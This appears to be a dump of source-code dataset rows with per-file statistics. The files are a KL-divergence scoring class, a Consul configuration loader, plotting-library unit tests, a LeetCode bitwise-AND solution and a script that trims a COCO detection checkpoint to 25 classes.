    min_value = min([min(sample1), min(sample2)])
    # np.linspace requires an integer sample count; older numpy silently
    # truncated a float here, so truncate explicitly for the same bins.
    bins = int((max_value - min_value) / kl_binsize)
    edges = np.linspace(min_value, max_value, bins)
    P, edges = np.histogram(sample1, bins=edges, density=True)
    Q, _ = np.histogram(sample2, bins=edges, density=True)
    return P, Q, edges, sample1, sample2


class kl_divergence(sciunit.Score):
    """
    Kullback-Leibler Divergence D_KL(P||Q)

    Calculates the difference of two sampled distributions P and Q in form of
    an entropy measure. The D_KL measure is effectively the difference of the
    cross-entropy of both distributions P,Q and the entropy of P.
    D_KL can be interpreted as the amount of information lost when
    approximating P by Q.

    .. math::
        D_\\mathrm{KL}(P||Q) = \\sum_{i} P(i) \\log_2 \\frac{P(i)}{Q(i)}
                             = H(P,Q) - H(P)

    The returned score is the symmetric version of the KL divergence

    .. math::
        D_\\mathrm{KL}(P,Q) := \\frac{1}{2}
            \\left(D_\\mathrm{KL}(P|Q) + D_\\mathrm{KL}(Q|P)\\right)

    Parameters
    ----------
    kl_binsize : float
        Bin size of the histogram, used to calculate the KL divergence.
    """
    score = np.nan

    @classmethod
    def compute(self, data_sample_1, data_sample_2, kl_binsize=0.005,
                **kwargs):
        """Compute the symmetric KL divergence of the two samples.

        Returns a kl_divergence score instance carrying the divergence value
        plus `data_size`, `discarded_values` and `bins` attributes.
        """
        P, Q, edges, sample1, sample2 = _finite_histograms(
            data_sample_1, data_sample_2, kl_binsize)
        init_len = len(P)
        # Drop bins where either density is zero: KL is undefined there.
        Qnot0 = np.where(Q != 0.)[0]
        P_non0 = P[Qnot0]
        Q_non0 = Q[Qnot0]
        Pnot0 = np.where(P_non0 != 0.)[0]
        Q_non0 = Q_non0[Pnot0]
        P_non0 = P_non0[Pnot0]
        final_len = len(P_non0)
        discard = init_len - final_len
        D_KL_PQ = entropy(P_non0, Q_non0, base=2)
        D_KL_QP = entropy(Q_non0, P_non0, base=2)
        # Symmetrized divergence.
        D_KL = .5 * (D_KL_PQ + D_KL_QP)
        self.score = kl_divergence(D_KL)
        self.score.data_size = [len(sample1), len(sample2)]
        self.score.discarded_values = discard
        self.score.bins = len(edges) - 1
        return self.score

    @classmethod
    def plot(self, data_sample_1, data_sample_2, ax=None, palette=None,
             var_name='Measured Parameter', kl_binsize=0.005,
             sample_names=['observation', 'prediction'], **kwargs):
        """Plot both densities and the local KL-divergence contribution.

        Returns the matplotlib axes used for plotting.
        """
        if ax is None:
            fig, ax = plt.subplots()
        ax.set_ylabel('Probability Density')
        ax.set_xlabel(var_name)
        if palette is None:
            palette = [sns.color_palette()[0], sns.color_palette()[1]]
        P, Q, edges, _, _ = _finite_histograms(
            data_sample_1, data_sample_2, kl_binsize)
        dx = np.diff(edges)[0]
        edges = edges[:-1]
        # Bin centers, extended by one bin on each side for the zero padding.
        xvalues = edges + dx / 2.
        xvalues = np.append(np.append(xvalues[0] - dx, xvalues),
                            xvalues[-1] + dx)

        def secure_log(E, D):
            # Elementwise log(E/D) that yields 0 wherever either side is 0.
            log = np.zeros_like(E)
            i = 0
            for e, d in zip(E, D):
                if e == 0 or d == 0:
                    log[i] = 0.
                else:
                    log[i] = np.log(e / d)
                i += 1
            return log

        diffy = .5 * (P - Q) * secure_log(P, Q.astype(float))
        P = np.append(np.append(0, P), 0)
        Q = np.append(np.append(0, Q), 0)
        filly = np.append(np.append(0., diffy), 0.)
        ax.fill_between(xvalues, filly, 0, color='0.8', label='d/dx DKL')
        ax.plot(xvalues, P, lw=2, color=palette[0], label=sample_names[0])
        ax.plot(xvalues, Q, lw=2, color=palette[1], label=sample_names[1])
        ax.set_xlim(xvalues[0], xvalues[-1])
        ax.set_yscale('log')
        plt.legend()
        return ax

    @property
    def sort_key(self):
        return self.score

    def __str__(self):
        return "\n\n\033[4mKullback-Leibler-Divergence\033[0m" \
            + "\n\tdatasize: {} \t {}" \
            .format(self.data_size[0], self.data_size[1]) \
            + "\n\tdiscarded: {}" \
            .format(self.discarded_values) \
            + "\n\tD_KL = {:.3f} \t bins = {}\n\n" \
            .format(self.score, self.bins)
35.912409
80
0.570732
706
4,920
3.815864
0.24221
0.044543
0.024499
0.025241
0.344469
0.312546
0.301411
0.282108
0.282108
0.282108
0
0.032184
0.292683
4,920
137
81
35.912409
0.741954
0.172764
0
0.263736
0
0
0.047595
0.011273
0
0
0
0
0
1
0.054945
false
0
0.065934
0.021978
0.197802
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdd862ba88395be8cb418cfab8ce408473323919
635
py
Python
kikyo/config.py
jadbin/kikyo
98d875e85a28b4141cbd6616bba3d397a4219dc9
[ "MIT" ]
null
null
null
kikyo/config.py
jadbin/kikyo
98d875e85a28b4141cbd6616bba3d397a4219dc9
[ "MIT" ]
null
null
null
kikyo/config.py
jadbin/kikyo
98d875e85a28b4141cbd6616bba3d397a4219dc9
[ "MIT" ]
null
null
null
import base64
import io

import requests
import yaml

from kikyo import Kikyo, Settings


def configure_by_consul(config_url: str, **kwargs) -> Kikyo:
    """Fetch a YAML-formatted configuration from Consul and build a client.

    :param config_url: URL used to fetch the configuration entries
    """
    response = requests.get(config_url)
    response.raise_for_status()

    settings = Settings()
    for entry in response.json():
        raw_value = entry['Value']
        if not raw_value:
            continue
        decoded = base64.b64decode(raw_value)
        parsed: dict = yaml.safe_load(io.BytesIO(decoded))
        if 'kikyo' in parsed:
            # Only the first entry containing a 'kikyo' section is used.
            settings.merge(parsed['kikyo'])
            break

    settings.merge(kwargs)
    return Kikyo(settings)
19.84375
60
0.617323
77
635
4.987013
0.545455
0.070313
0
0
0
0
0
0
0
0
0
0.013129
0.280315
635
31
61
20.483871
0.827133
0.08189
0
0
0
0
0.026408
0
0
0
0
0
0
1
0.05
false
0
0.25
0
0.35
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdd932ec045f92a204fc0462b20bc5fe9de822e1
5,077
py
Python
tests/ep_canvas_test.py
PytLab/catplot
63ad46218b17d5cdffdd026dad7d775cf4caa50b
[ "MIT" ]
35
2015-12-23T08:01:15.000Z
2021-11-03T01:34:20.000Z
tests/ep_canvas_test.py
PytLab/catplot
63ad46218b17d5cdffdd026dad7d775cf4caa50b
[ "MIT" ]
1
2015-11-25T05:52:43.000Z
2017-04-11T14:06:00.000Z
tests/ep_canvas_test.py
PytLab/catplot
63ad46218b17d5cdffdd026dad7d775cf4caa50b
[ "MIT" ]
10
2015-11-06T20:23:32.000Z
2020-05-16T19:18:38.000Z
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Test case for Energy Profile Canvas.
"""

import unittest

import matplotlib.pyplot as plt

from catplot.ep_components.ep_canvas import EPCanvas
from catplot.ep_components.ep_lines import ElementaryLine
from catplot.ep_components.ep_chain import EPChain


class EPCanvasTest(unittest.TestCase):

    def setUp(self):
        self.maxDiff = True

    def test_construction_and_query(self):
        """ Test we can construct ElementaryLine object correctly.
        """
        canvas = EPCanvas(margin_ratio=0.2)

        self.assertEqual(canvas.margin_ratio, 0.2)
        self.assertIsNone(canvas.figsize)
        self.assertIsNone(canvas.dpi)
        self.assertIsNone(canvas.facecolor)
        self.assertIsNone(canvas.edgecolor)
        self.assertListEqual(canvas.lines, [])
        self.assertListEqual(canvas.shadow_lines, [])
        self.assertTrue(canvas.figure)
        self.assertTrue(canvas.axes)

        # Check invalid reaction equation.
        self.assertRaises(ValueError, EPCanvas, margin_ratio=-0.1)

        plt.close(canvas.figure)

    def test_draw(self):
        """ Make sure the lines can be added without exceptions.
        """
        canvas = EPCanvas()
        line = ElementaryLine([0.0, 1.3, 0.8])
        canvas.add_lines([line])
        canvas.draw()

        plt.close(canvas.figure)

    def test_add_species_annotations(self):
        """ Make sure the species annotations can be added without exceptions.
        """
        canvas = EPCanvas()
        line = ElementaryLine([0.0, 1.3, 0.8],
                              rxn_equation="CO_b + O_b <-> CO-O_2b -> CO2_g + 2*_b")
        canvas.add_lines([line])
        canvas.add_species_annotations(line)

        plt.close(canvas.figure)

    def test_add_horizontal_auxiliary_line(self):
        """ Make sure the horizontal line can be added without exceptions.
        """
        canvas = EPCanvas()
        line = ElementaryLine([0.0, 1.3, 0.8])
        canvas.add_lines([line])
        canvas.add_horizontal_auxiliary_line(line)

        plt.close(canvas.figure)

    def test_add_vertical_auxiliary_line(self):
        """ Make sure the vertical line can be added without exceptions.
        """
        canvas = EPCanvas()
        line = ElementaryLine([0.0, 1.3, 0.8])
        canvas.add_lines([line])
        canvas.add_vertical_auxiliary_lines(line)

        plt.close(canvas.figure)

    def test_add_energy_annotations(self):
        """ Make sure the energy annotations can be added correctly.
        """
        canvas = EPCanvas()
        line = ElementaryLine([0.0, 1.3, 0.8])
        canvas.add_lines([line])
        canvas.add_energy_annotations(line)

        plt.close(canvas.figure)

    def test_add_chain(self):
        """ Test energy profile chain can be added correctly to canvas.
        """
        canvas = EPCanvas()
        self.assertFalse(canvas.lines)
        self.assertFalse(canvas.chains)

        l1 = ElementaryLine([0.0, 1.2, 0.6])
        l2 = ElementaryLine([0.0, 1.0, 0.8])
        chain = EPChain([l1, l2])

        canvas.add_chain(chain)
        # All lines in the chain are unpacked into canvas.lines.
        self.assertEqual(len(canvas.lines), 2)
        for l in canvas.lines:
            self.assertTrue(isinstance(l, ElementaryLine))
        self.assertEqual(len(canvas.chains), 1)
        self.assertTrue(isinstance(canvas.chains[0], EPChain))

        # Exception is expected if add the chain again.
        self.assertRaises(ValueError, canvas.add_chain, chain)

        plt.close(canvas.figure)

    def test_contains(self):
        # `in` works for both single lines and whole chains.
        canvas = EPCanvas()
        l1 = ElementaryLine([0.0, 1.2, 0.6])
        l2 = ElementaryLine([0.0, 1.0, 0.8])
        chain = EPChain([l1])
        canvas.add_chain(chain)

        self.assertTrue(l1 in canvas)
        self.assertTrue(chain in canvas)
        self.assertFalse(l2 in canvas)

        plt.close(canvas.figure)

    def test_add_line(self):
        """ Test the line can be add to canvas correctly.
        """
        canvas = EPCanvas()
        l1 = ElementaryLine([0.0, 1.2, 0.6])
        canvas.add_line(l1)

        # Add repeat line, exception raises.
        self.assertRaises(ValueError, canvas.add_line, l1)

        plt.close(canvas.figure)

    def test_add_lines(self):
        # Adding a duplicated line through add_lines must also raise.
        canvas = EPCanvas()
        l1 = ElementaryLine([0.0, 1.2, 0.6])
        l2 = ElementaryLine([0.0, 1.0, 0.8])
        canvas.add_lines([l1, l2])

        canvas.lines = []
        self.assertRaises(ValueError, canvas.add_lines, [l1, l1])

        plt.close(canvas.figure)

    def test_add_all_horizontal_auxiliary_lines(self):
        """ Make sure we can add all horizontal auxiliary lines to canvas.
        """
        canvas = EPCanvas()
        l1 = ElementaryLine([0.0, 1.2, 0.6])
        l2 = ElementaryLine([0.0, 1.0, 0.8])
        canvas.add_lines([l1, l2])
        canvas.add_all_horizontal_auxiliary_lines()

        plt.close(canvas.figure)


if "__main__" == __name__:
    suite = unittest.TestLoader().loadTestsFromTestCase(EPCanvasTest)
    unittest.TextTestRunner(verbosity=2).run(suite)
30.769697
84
0.623203
631
5,077
4.885895
0.187005
0.011677
0.072657
0.077198
0.508271
0.378852
0.334415
0.314953
0.272138
0.242945
0
0.031957
0.26039
5,077
164
85
30.957317
0.789081
0.157179
0
0.425743
0
0
0.010921
0
0
0
0
0
0.217822
1
0.118812
false
0
0.049505
0
0.178218
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdd9723808bf563a488aa0b07c42aceeac435545
458
py
Python
Leetcode/medium/bitwise-and-of-numbers-range.py
jen-sjen/data-structures-basics-leetcode
addac32974b16e0a37aa60c210ab7820b349b279
[ "MIT" ]
6
2021-07-29T03:26:20.000Z
2022-01-28T15:11:45.000Z
Leetcode/medium/bitwise-and-of-numbers-range.py
jen-sjen/data-structures-basics-leetcode
addac32974b16e0a37aa60c210ab7820b349b279
[ "MIT" ]
2
2021-09-30T09:47:23.000Z
2022-01-31T03:08:24.000Z
Leetcode/medium/bitwise-and-of-numbers-range.py
jen-sjen/data-structures-basics-leetcode
addac32974b16e0a37aa60c210ab7820b349b279
[ "MIT" ]
5
2021-08-10T06:41:11.000Z
2022-01-29T17:50:20.000Z
""" # BITWISE AND OF NUMBERS RANGE Given a range [m, n] where 0 <= m <= n <= 2147483647, return the bitwise AND of all numbers in this range, inclusive. Example 1: Input: [5,7] Output: 4 Example 2: Input: [0,1] Output: 0 """ class Solution: def rangeBitwiseAnd(self, m: int, n: int) -> int: count = 0 while m < n: m = m >> 1 n = n >> 1 count += 1 return m << count
17.615385
117
0.508734
66
458
3.530303
0.515152
0.025751
0.103004
0
0
0
0
0
0
0
0
0.080139
0.373362
458
26
118
17.615385
0.731707
0.482533
0
0
0
0
0
0
0
0
0
0
0
1
0.125
false
0
0
0
0.375
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bddccaa847cf3d70df32c8b547be9368dbd1d908
20
py
Python
api/views/consts.py
tarikyayla/reddit_dashboard
e5ecf3349a5c9333793c3ae5375bc4a0e501a16c
[ "MIT" ]
null
null
null
api/views/consts.py
tarikyayla/reddit_dashboard
e5ecf3349a5c9333793c3ae5375bc4a0e501a16c
[ "MIT" ]
null
null
null
api/views/consts.py
tarikyayla/reddit_dashboard
e5ecf3349a5c9333793c3ae5375bc4a0e501a16c
[ "MIT" ]
1
2020-11-27T23:24:09.000Z
2020-11-27T23:24:09.000Z
# NOTE(review): presumably an action/source identifier meaning "fetch data
# directly from Reddit" — confirm against the views that import this constant.
GET_FROM_REDDIT = 1
10
19
0.8
4
20
3.5
1
0
0
0
0
0
0
0
0
0
0
0.058824
0.15
20
1
20
20
0.764706
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
bddd1a20f636344c19e0119a658dd15a4909a0a2
2,955
py
Python
match_rcnn/mmdetection/mmdet/pretrained_models/cocopth.py
201419/taobao-live-product-recognition
1f5de5917b43b2b58f4387a77272fc7c587a1051
[ "Apache-2.0" ]
null
null
null
match_rcnn/mmdetection/mmdet/pretrained_models/cocopth.py
201419/taobao-live-product-recognition
1f5de5917b43b2b58f4387a77272fc7c587a1051
[ "Apache-2.0" ]
null
null
null
match_rcnn/mmdetection/mmdet/pretrained_models/cocopth.py
201419/taobao-live-product-recognition
1f5de5917b43b2b58f4387a77272fc7c587a1051
[ "Apache-2.0" ]
1
2021-05-14T03:30:29.000Z
2021-05-14T03:30:29.000Z
# Adapt a COCO-pretrained Faster R-CNN checkpoint to a detector with
# `num_classes` classes: load the .pth state dict, truncate the bbox head's
# classification and regression layers to the new class count, and save the
# result under a new path.  RPN-head surgery experiments are kept below as
# commented-out code.
import torch
import numpy as np

# Target number of classes for the adapted checkpoint.
num_classes = 25

# NOTE(review): hard-coded local path — adjust before reuse.
model_coco = torch.load(r"/media/alvinai/Documents/model/faster_rcnn_r50_fpn_1x_20190610-bf0ea559.pth")

# print(model_coco)
# print(model_coco["state_dict"]["rpn_head.rpn_cls.weight"].shape)
# a = model_coco["state_dict"]["rpn_head.rpn_cls.weight"][0]
# model_coco["state_dict"]["rpn_head.rpn_cls.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_cls.weight"], 0, values=a, axis=0)
# print(model_coco["state_dict"]["rpn_head.rpn_cls.weight"].shape)
# b=model_coco["state_dict"]["rpn_head.rpn_cls.bias"][0]
# model_coco["state_dict"]["rpn_head.rpn_cls.bias"] = np.insert(model_coco["state_dict"]["rpn_head.rpn_cls.bias"], 0, values=b, axis=0)
# print(model_coco["state_dict"]["rpn_head.rpn_cls.bias"].shape)
# c= model_coco["state_dict"]["rpn_head.rpn_reg.weight"][0].repeat(4,1,1,1)
# model_coco["state_dict"]["rpn_head.rpn_reg.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.weight"], 0, values=c, axis=0)
# # c= model_coco["state_dict"]["rpn_head.rpn_reg.weight"][1]
# # model_coco["state_dict"]["rpn_head.rpn_reg.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.weight"], 0, values=c, axis=0)
# # c= model_coco["state_dict"]["rpn_head.rpn_reg.weight"][2]
# # model_coco["state_dict"]["rpn_head.rpn_reg.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.weight"], 0, values=c, axis=0)
# # c= model_coco["state_dict"]["rpn_head.rpn_reg.weight"][3]
# # model_coco["state_dict"]["rpn_head.rpn_reg.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.weight"], 0, values=c, axis=0)
# print(model_coco["state_dict"]["rpn_head.rpn_reg.weight"].shape)
# d=model_coco["state_dict"]["rpn_head.rpn_reg.bias"][0].repeat(4,)
# model_coco["state_dict"]["rpn_head.rpn_reg.bias"] = np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.bias"], 0, values=d, axis=0)
# print(model_coco["state_dict"]["rpn_head.rpn_reg.bias"].shape)
# # model_coco["state_dict"]["rpn_head.rpn_reg.weight"] = model_coco["state_dict"]["rpn_head.rpn_reg.weight"].repeat(2,1,1,1)
# # model_coco["state_dict"]["rpn_head.rpn_reg.bias"] = model_coco["state_dict"]["rpn_head.rpn_reg.bias"].repeat(2,)

# weight
# Keep only the first num_classes rows of the classifier, and num_classes*4
# rows of the box regressor (4 regression targets per class).
model_coco["state_dict"]["bbox_head.fc_cls.weight"] = model_coco["state_dict"]["bbox_head.fc_cls.weight"][
                                                      :num_classes, :]
model_coco["state_dict"]["bbox_head.fc_reg.weight"] = model_coco["state_dict"]["bbox_head.fc_reg.weight"][
                                                      :num_classes*4, :]
# bias
model_coco["state_dict"]["bbox_head.fc_cls.bias"] = model_coco["state_dict"]["bbox_head.fc_cls.bias"][:num_classes]
model_coco["state_dict"]["bbox_head.fc_reg.bias"] = model_coco["state_dict"]["bbox_head.fc_reg.bias"][:num_classes*4]

# save new model
torch.save(model_coco, r"/media/alvinai/Documents/underwater/model/libra_faster_rcnn_r50_fpn_1x_cls_%d.pth" % num_classes)
75.769231
140
0.706937
494
2,955
3.878543
0.105263
0.192589
0.277662
0.356994
0.845511
0.826722
0.826722
0.826722
0.826722
0.669102
0
0.019806
0.094416
2,955
38
141
77.763158
0.696188
0.671404
0
0
0
0
0.458287
0.369299
0
0
0
0
0
1
0
false
0
0.181818
0
0.181818
0
0
0
0
null
0
1
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8